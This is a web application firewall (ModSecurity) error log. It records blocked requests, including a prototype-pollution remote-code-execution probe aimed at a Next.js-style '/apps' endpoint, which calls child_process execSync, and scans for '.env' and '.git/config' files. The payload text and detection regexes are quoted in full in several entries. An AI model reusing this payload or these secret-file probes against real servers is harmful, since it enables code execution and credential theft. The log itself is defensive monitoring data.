`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTn1a-Zts9-519mDKTwjVgAAAAM"]
[Wed Dec 10 23:34:19.383727 2025] [:error] [pid 657889] [client 3.75.170.6:46514] [client 3.75.170.6] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTn1a-Zts9-519mDKTwjVgAAAAM"]
[Wed Dec 10 23:34:19.384014 2025] [:error] [pid 657889] [client 3.75.170.6:46514] [client 3.75.170.6] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTn1a-Zts9-519mDKTwjVgAAAAM"]
[Thu Dec 11 02:15:49.942940 2025] [:error] [pid 658338] [client 52.194.186.137:58876] [client 52.194.186.137] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTobReKO9Y-lmoA-IBEOxwAAAAI"]
[Thu Dec 11 02:15:49.943465 2025] [:error] [pid 658338] [client 52.194.186.137:58876] [client 52.194.186.137] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTobReKO9Y-lmoA-IBEOxwAAAAI"]
[Thu Dec 11 02:15:49.944602 2025] [:error] [pid 658338] [client 52.194.186.137:58876] [client 52.194.186.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTobReKO9Y-lmoA-IBEOxwAAAAI"]
[Thu Dec 11 02:15:49.944804 2025] [:error] [pid 658338] [client 52.194.186.137:58876] [client 52.194.186.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTobReKO9Y-lmoA-IBEOxwAAAAI"]
[Thu Dec 11 02:24:02.614252 2025] [:error] [pid 658336] [client 45.139.104.171:55708] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTodMjRgF4eBlyzjwJL0aQAAAAc"]
[Thu Dec 11 02:24:02.614587 2025] [:error] [pid 658336] [client 45.139.104.171:55708] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTodMjRgF4eBlyzjwJL0aQAAAAc"]
[Thu Dec 11 02:24:02.614781 2025] [:error] [pid 658336] [client 45.139.104.171:55708] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTodMjRgF4eBlyzjwJL0aQAAAAc"]
[Thu Dec 11 04:09:41.888797 2025] [:error] [pid 660795] [client 3.255.208.24:56276] [client 3.255.208.24] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTo19UkNhNGbVrfHEmhHbAAAAAI"]
[Thu Dec 11 04:09:41.889306 2025] [:error] [pid 660795] [client 3.255.208.24:56276] [client 3.255.208.24] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTo19UkNhNGbVrfHEmhHbAAAAAI"]
[Thu Dec 11 04:09:41.890279 2025] [:error] [pid 660795] [client 3.255.208.24:56276] [client 3.255.208.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTo19UkNhNGbVrfHEmhHbAAAAAI"]
[Thu Dec 11 04:09:41.890482 2025] [:error] [pid 660795] [client 3.255.208.24:56276] [client 3.255.208.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTo19UkNhNGbVrfHEmhHbAAAAAI"]
[Thu Dec 11 04:59:50.068032 2025] [:error] [pid 661873] [client 3.250.55.164:48730] [client 3.250.55.164] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTpBtrhRgKmcuSBY7TbChQAAAAY"]
[Thu Dec 11 04:59:50.068538 2025] [:error] [pid 661873] [client 3.250.55.164:48730] [client 3.250.55.164] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTpBtrhRgKmcuSBY7TbChQAAAAY"]
[Thu Dec 11 04:59:50.069507 2025] [:error] [pid 661873] [client 3.250.55.164:48730] [client 3.250.55.164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTpBtrhRgKmcuSBY7TbChQAAAAY"]
[Thu Dec 11 04:59:50.069716 2025] [:error] [pid 661873] [client 3.250.55.164:48730] [client 3.250.55.164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTpBtrhRgKmcuSBY7TbChQAAAAY"]
[Thu Dec 11 06:53:54.327865 2025] [:error] [pid 662183] [client 45.148.10.250:41406] [client 45.148.10.250] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTpccij3kiV1jR7nMtPHwQAAAAc"]
[Thu Dec 11 06:53:54.328172 2025] [:error] [pid 662183] [client 45.148.10.250:41406] [client 45.148.10.250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTpccij3kiV1jR7nMtPHwQAAAAc"]
[Thu Dec 11 06:53:54.328348 2025] [:error] [pid 662183] [client 45.148.10.250:41406] [client 45.148.10.250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTpccij3kiV1jR7nMtPHwQAAAAc"]
[Thu Dec 11 07:55:06.833229 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTpqykkNhNGbVrfHEmhHiQAAAAI"]
[Thu Dec 11 07:55:06.833458 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTpqykkNhNGbVrfHEmhHiQAAAAI"]
[Thu Dec 11 07:55:06.833649 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTpqykkNhNGbVrfHEmhHiQAAAAI"]
[Thu Dec 11 07:55:06.979087 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTpqykkNhNGbVrfHEmhHigAAAAI"]
[Thu Dec 11 07:55:06.979356 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTpqykkNhNGbVrfHEmhHigAAAAI"]
[Thu Dec 11 07:55:06.979594 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTpqykkNhNGbVrfHEmhHigAAAAI"]
[Thu Dec 11 07:55:07.151930 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHiwAAAAI"]
[Thu Dec 11 07:55:07.152144 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHiwAAAAI"]
[Thu Dec 11 07:55:07.152327 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHiwAAAAI"]
[Thu Dec 11 07:55:07.291253 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHjAAAAAI"]
[Thu Dec 11 07:55:07.291471 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHjAAAAAI"]
[Thu Dec 11 07:55:07.291676 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHjAAAAAI"]
[Thu Dec 11 07:55:07.462819 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHjQAAAAI"]
[Thu Dec 11 07:55:07.463033 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHjQAAAAI"]
[Thu Dec 11 07:55:07.463214 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTpqy0kNhNGbVrfHEmhHjQAAAAI"]
